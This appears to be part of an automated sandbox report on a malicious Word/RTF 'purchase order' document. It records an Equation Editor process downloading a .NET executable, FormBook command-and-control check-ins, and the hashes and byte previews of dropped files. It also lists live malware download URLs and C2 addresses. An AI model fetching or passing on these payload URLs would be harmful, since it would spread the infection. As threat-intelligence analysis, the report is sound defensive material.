                                                      http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.%s.comPAexplorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		low
                                                      http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpfalse
                                                        		high
                                                        https://support.mozilla.orgexplorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpfalse
                                                          		high
                                                          http://www.msn.com/?ocid=iehp0explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            172.67.184.102
                                                            		www.volunteervabetweenk.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            34.102.136.180
                                                            		publicfigure.skinUnited States
                                                            		15169GOOGLEUSfalse
                                                            37.0.9.166
                                                            		dell-tv.tkNetherlands
                                                            		198301WKD-ASIEtrue

                                                            Private

                                                            IP
                                                            192.168.2.255

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:528734
                                                            Start date:25.11.2021
                                                            Start time:18:07:48
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 58s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:P.O-5433ERE.doc
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:11
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winDOC@9/9@6/4
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 22.5% (good quality ratio 21%)
                                                            • Quality average: 74.3%
                                                            • Quality standard deviation: 29.9%
                                                            HCA Information:
                                                            • Successful, ratio: 91%
                                                            • Number of executed functions: 83
                                                            • Number of non-executed functions: 45
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .doc
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 144.91.75.9
                                                            • Excluded domains from analysis (whitelisted): sevensummitclimbing.com, www.sevensummitclimbing.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            18:08:17API Interceptor179x Sleep call for process: EQNEDT32.EXE modified
                                                            18:08:24API Interceptor55x Sleep call for process: ashlkyvc7592.exe modified
                                                            18:08:45API Interceptor95x Sleep call for process: cmstp.exe modified
                                                            18:10:00API Interceptor1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            37.0.9.166Quotation No. Q07387.docGet hashmaliciousBrowse
                                                            • dell-tv.tk/templezx.exe
                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                            • dell-tv.tk/xzx.exe
                                                            Order ID 1426095239.docGet hashmaliciousBrowse
                                                            • kizitox.ga/mazx.exe
                                                            PAYMENT2021A0087NOV.docGet hashmaliciousBrowse
                                                            • kizitox.ga/chriszx.exe
                                                            Temp Order2.exeGet hashmaliciousBrowse
                                                            • drossmnfg.com/stallion/index.php
                                                            Rev_NN doccument.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/hussanzx.exe
                                                            20211122.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/famzx.exe
                                                            PO-20212222.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/obizx.exe
                                                            BANK DETAILS.docGet hashmaliciousBrowse
                                                            • kizitox.ga/mazx.exe
                                                            50% TT advance copy.docGet hashmaliciousBrowse
                                                            • kizitox.ga/ugopoundzx.exe
                                                            Drawing-FS3589_Surra-Unprice BOQ - Lock file - 28.1.2021.xlsx 788K.docGet hashmaliciousBrowse
                                                            • kizitox.ga/mpomzx.exe
                                                            PURCHASE ORDER.docGet hashmaliciousBrowse
                                                            • kizitox.ga/chriszx.exe
                                                            DHL AWB TRACKING DETAILS.docGet hashmaliciousBrowse
                                                            • kizitox.ga/okeyzx.exe
                                                            items.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/arinzezx.exe
                                                            my orderPDF.exeGet hashmaliciousBrowse
                                                            • drossmnfg.com/stallion/index.php
                                                            Order Speficications.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/urchzx.exe
                                                            temp order (2).exeGet hashmaliciousBrowse
                                                            • drossmnfg.com/stallion/index.php
                                                            444order.docGet hashmaliciousBrowse
                                                            • kizitox.ga/doziezx.exe
                                                            SCANNED DOCUMENT.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/obizx.exe
                                                            HOLLAND - TEKL#U0130F MEKTUBU - 19,11,2021 - T.D.docGet hashmaliciousBrowse
                                                            • kizitox.ga/chungzx.exe

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            dell-tv.tkQuotation No. Q07387.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            nwamafour.exeGet hashmaliciousBrowse
                                                            • 162.215.241.145
                                                            nwamafour.exeGet hashmaliciousBrowse
                                                            • 162.215.241.145
                                                            WeChat image_20210422104940_PDF.exeGet hashmaliciousBrowse
                                                            • 162.215.241.145

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            CLOUDFLARENETUSQuotation No. Q07387.docGet hashmaliciousBrowse
                                                            • 104.21.19.200
                                                            hSlk750R2b.exeGet hashmaliciousBrowse
                                                            • 104.23.98.190
                                                            Order Contract_signed (2NQ39NGAY0GD).ppamGet hashmaliciousBrowse
                                                            • 104.16.203.237
                                                            Halbank Ekstre 2021101 073653 270424.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            Hong Jin International Co Ltd -Order Specification.exeGet hashmaliciousBrowse
                                                            • 104.21.19.200
                                                            ORDER PROPOSAL.exeGet hashmaliciousBrowse
                                                            • 162.159.134.233
                                                            8p2NlqFgew.exeGet hashmaliciousBrowse
                                                            • 162.159.135.233
                                                            TT COPY_02101011.exeGet hashmaliciousBrowse
                                                            • 172.67.158.42
                                                            GZ4OR9sIdP.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            4lWWTrEJuS.exeGet hashmaliciousBrowse
                                                            • 104.21.31.203
                                                            TT_SWIFT_Export Order_noref S10SMG00318021.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            TxIDbatch#7809.htmGet hashmaliciousBrowse
                                                            • 104.16.18.94
                                                            Se adjunta el pedido, proforma.exeGet hashmaliciousBrowse
                                                            • 162.159.134.233
                                                            Google_Play_Store_flow_split.apkGet hashmaliciousBrowse
                                                            • 104.21.4.48
                                                            Statement.htmlGet hashmaliciousBrowse
                                                            • 104.16.18.94
                                                            Employee payment plan.HTMGet hashmaliciousBrowse
                                                            • 104.18.10.207
                                                            S9yf6BkjhTQUbHE.exeGet hashmaliciousBrowse
                                                            • 172.67.178.31
                                                            Halbank Ekstre 2021101 073653 270424.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            yH8giB6jJ2.exeGet hashmaliciousBrowse
                                                            • 162.159.135.233
                                                            pwY5ozOzpYGet hashmaliciousBrowse
                                                            • 172.64.209.6
                                                            WKD-ASIEQuotation No. Q07387.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            0VDGA4mWCE.exeGet hashmaliciousBrowse
                                                            • 37.0.10.250
                                                            Payment+Advice.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            Invitation PQ Documents Submission QTN.(#U007eMB).docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            PO201808143_330542IMG_20200710_0008.rtfGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            874578.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            2020 year financial report.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            Payment Advice.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            PO 36457967.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            QUOTE20212411.docGet hashmaliciousBrowse
                                                            • 37.0.11.230
                                                            Order ID 1426095239.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            PAYMENT2021A0087NOV.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            Temp Order2.exeGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            162AB00C0E943F9548B04F3437867508656480585369C.exeGet hashmaliciousBrowse
                                                            • 37.0.11.8
                                                            Rev_NN doccument.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            20211122.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            PO-20212222.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            BANK DETAILS.docGet hashmaliciousBrowse
                                                            • 37.0.9.166
                                                            50% TT advance copy.docGet hashmaliciousBrowse
                                                            • 37.0.9.166

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:downloaded
                                                            Size (bytes):560128
                                                            Entropy (8bit):7.648991597743519
                                                            Encrypted:false
                                                            SSDEEP:12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
                                                            MD5:D236BB1F86CAEC110ABB20FC2360E25B
                                                            SHA1:0611498ED409D30150D2A0B2A6426E5CB9504D8A
                                                            SHA-256:2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
                                                            SHA-512:4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
                                                            Malicious:true
                                                            Reputation:low
                                                            IE Cache URL:http://dell-tv.tk/ashlyzx.exe
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):5632
                                                            Entropy (8bit):4.139240799996483
                                                            Encrypted:false
                                                            SSDEEP:48:roMMP9awF8kcQNxFYCiMjbi3sAT3ZMidDs9n5bSUEppRu+:/MPD8kcYHJjezIENdl
                                                            MD5:B020D2CE44C467E09C418C1F777299A6
                                                            SHA1:D0394BC7ED85C851703043A84F028B3CA6C47B5B
                                                            SHA-256:2A81E3D4E24096064B48F6E027444A37E9FADD9375DD5ADCDD69AED75F847769
                                                            SHA-512:5E89FD1536298E0D1AEA1C9C2A5C6744CFC52F4830C0CBCA7A828912067972502AAA069EC94B1C0746FB5A9696C13F84A1865DD9A721D02C9857E934C2B3C6E5
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{780FD6C6-AC2E-47FB-9E8C-CE3647E85B1F}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16896
                                                            Entropy (8bit):3.570527510134586
                                                            Encrypted:false
                                                            SSDEEP:384:8BuQrm+Mk+CkPYTJxgdHjGdIfZ3fbTreF8FNWZ:8EQKvk+BPYl9Kvz/WZ
                                                            MD5:D7466498EA7397EC632CB793A4B67FB8
                                                            SHA1:EA7FABB10EE13095DD52A380F1C9D3130714D58A
                                                            SHA-256:F09706A2416ABDA332F431EE91348A088DBF4F8D6F0702CCAFF28B8EB5A6CF32
                                                            SHA-512:F0638D0187B7B7F48262298C84A18B63E381C096CE78A65ED7E72EBD166C1E62D386E1B0B562021C4F218BE36C1C7F79A148E51ADE663A3E365E2738C7B3D40D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: '.=.?...&.=.+...?.2.4.>.[./.^.!.2.-.|.?.?.?.|.$.?.%.^.%.*.`.+.9.,.#.?.?.%.8.6...?.#.<.'.;.+.6.|.'.0.+.%.@.|._._.'.6.,.|...<.7.`._.(.<.0.0.=.9.;.&...2.&.=.=.?.(.?.1.>.#...4.-.~._.2.?.~.(.4./.|.0...,.].|...(.?.?...1.?.@.<.~.'.?.'._.|.?.4.].[.&.@.$.?.#.?.?.&.^.@.).;.|.(.].3.~.`._.<.?.,.`.5.~.(.`.7.-.?.>.;.(.).<.^.+.^.!.,.4.6.~.7.7.]./._.?.#.0.2.,.:.?.].|.8.|.].4...^.].&.|.?.%._.9.%.?.4.).3...~.4.?...?.^.&.[.$.?.;.?.=.&.%.5...@...;.~.>.;.?.%...4.%.?.&.;.).:.(.;.+.$.3.[.?.0.?...3.[.?.1.1.../.2...]...7.2.3...>.;.0.5...=.:.1.*.].=.?.2.*.?.?.?.*.[...|.?.&.;.;.?.).7.?.'.%.[.'.%.8.?.6.%...?.7.#.'.9.3.).$.;.?.;.4.3.].&.!.$.#.4.?...?.^.%.?.3.*.'.[.?.5.(./.%.?.^.&.'.'.$.~.@.9.1.^.9.).6.|.^.>.>.;.&.6.>.#.*.4.!.&.:.`././.1.[.6.1.0.~.:...`.?.1.]./.~.-.+.?.%.?.?.?.0.~.?.~.0.,.4.~...?.?.=.%.?.%.`.|.&.|.$.+.:.?.4.%.?.8._.1.;.8.1.9.?.~...?.).?..._.7.-.~.^.=.$._.?.?.~...].......1.).=.!.0.4...:.4.*.2.1.'.2.7.)...~.?.8.$.....:.3.)./.1.~._.?.!.4.:.9.:.!..._.#.>.@.<...!.!...;.=.&.:.~.^.:.%.0.?.8.;...~.!.+.=.1.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\P.O-5433ERE.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Fri Nov 26 01:08:15 2021, length=21635, window=hide
                                                            Category:dropped
                                                            Size (bytes):1019
                                                            Entropy (8bit):4.530153378570899
                                                            Encrypted:false
                                                            SSDEEP:24:8CNeq7k/XTuzLIvcNe9sgmDv3q6iQd7Qy:8CNeq7k/XTkIcNgzttUj
                                                            MD5:9892E2ECCDB56857139B89D1CC41DE9B
                                                            SHA1:B0965C6B38F9190AB9FDA1770B43F5F5E5D746FE
                                                            SHA-256:896A255ACA90326B2CAAA3F51EB0AB779DA76525EF9FD3232CCD910DAA9787D8
                                                            SHA-512:8778AFD4B7FF99A07DEF6495861076998BB6BC566465E36AF84414B164B6577B36825B629F0B3C78D60661FDE9A5B094DEC90B14EA0DF4F9EDE8EE17B0C2D3BE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: L..................F.... ......?......?...;..yj....T...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..T..zS.. .PO-543~1.DOC..L.......S...S..*.........................P...O.-.5.4.3.3.E.R.E...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\P.O-5433ERE.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P...O.-.5.4.3.3.E.R.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......376483..........D_....3N...W...9..g............[D_....3N...W...9.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):73
                                                            Entropy (8bit):4.773958169341782
                                                            Encrypted:false
                                                            SSDEEP:3:bDuMJltejggLFXVomX1BzEggLFXVov:bCmeEOBVh/OBVy
                                                            MD5:131E7683725D996AEC21A1F5847BCDE0
                                                            SHA1:D2072FE38996DC116BB8F83FAA6EB06DA12A12BC
                                                            SHA-256:5C4CEDA284DE11D195F3FFBE973AFE37C644D83E539A0FD45D669DE21AC889E3
                                                            SHA-512:B54A862B3A415138850784C131BCB85F43BFDA6F2E39C737C18A6347450BB94F79F1C813486E42AA4316DD291A7A88C533355C1DB48117FF3B431BFE46023BF5
                                                            Malicious:false
                                                            Preview: [folders]..Templates.LNK=0..P.O-5433ERE.LNK=0..[doc]..P.O-5433ERE.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.5038355507075254
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):560128
                                                            Entropy (8bit):7.648991597743519
                                                            Encrypted:false
                                                            SSDEEP:12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
                                                            MD5:D236BB1F86CAEC110ABB20FC2360E25B
                                                            SHA1:0611498ED409D30150D2A0B2A6426E5CB9504D8A
                                                            SHA-256:2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
                                                            SHA-512:4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
                                                            Malicious:true
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\Desktop\~$O-5433ERE.doc
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.5038355507075254
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.45528097771043
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:P.O-5433ERE.doc
                                                            File size:21635
                                                            MD5:17ca06000e92058f0d43259b2683537c
                                                            SHA1:db453e5125310d209fe04fb0211677d79d25f3ee
                                                            SHA256:3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
                                                            SHA512:3e05cc9f7284eb7a1d6756380882b0b1b2d89ce42b887e6c28c49342a9ce61157392997f7bdd96add1fbeefe3ea2ce07c14e8b1e6b245488a2c248d0b8e51148
                                                            SSDEEP:384:ziXxa+OcfzOxCtiij+jSAF5yQZ5v8dqhS/MF0rDXjq/:mxdy4tiij+jSy/iqhf
                                                            File Content Preview:{\rtf713'=?.&=+.?24>[/^!2-|???|$?%^%*`+9,#??%86.?#<';+6|'0+%@|__'6,|.<7`_(<00=9;&.2&==?(?1>#.4-~_2?~(4/|0.,]|.(??.1?@<~'?'_|?4][&@$?#??&^@);|(]3~`_<?,`5~(`7-?>;()<^+^!,46~77]/_?#02,:?]|8|]4.^]&|?%_9%?4)3.~4?.?^&[$?;?=&%5.@.;~>;?%.4%?&;):(;+$3[?0?.3[?11./2

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                            000001F62hno
                                                            100001F16h2embeddedEqUatIon.31614no

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            11/25/21-18:10:21.768246TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22144.91.75.9
                                                            11/25/21-18:10:21.768246TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22144.91.75.9
                                                            11/25/21-18:10:21.768246TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22144.91.75.9
                                                            11/25/21-18:10:31.987537TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                                            11/25/21-18:10:31.987537TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                                            11/25/21-18:10:31.987537TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                                            11/25/21-18:10:32.106174TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22
                                                            11/25/21-18:10:37.240250TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                            11/25/21-18:10:37.240250TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                            11/25/21-18:10:37.240250TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                            11/25/21-18:10:37.357869TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 18:08:39.144543886 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.172197104 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.172300100 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.172686100 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.200264931 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202337980 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202358961 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202399969 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202477932 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202503920 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202521086 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202532053 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202568054 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202580929 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202594042 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.202670097 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.202718973 CET4916580192.168.2.2237.0.9.166
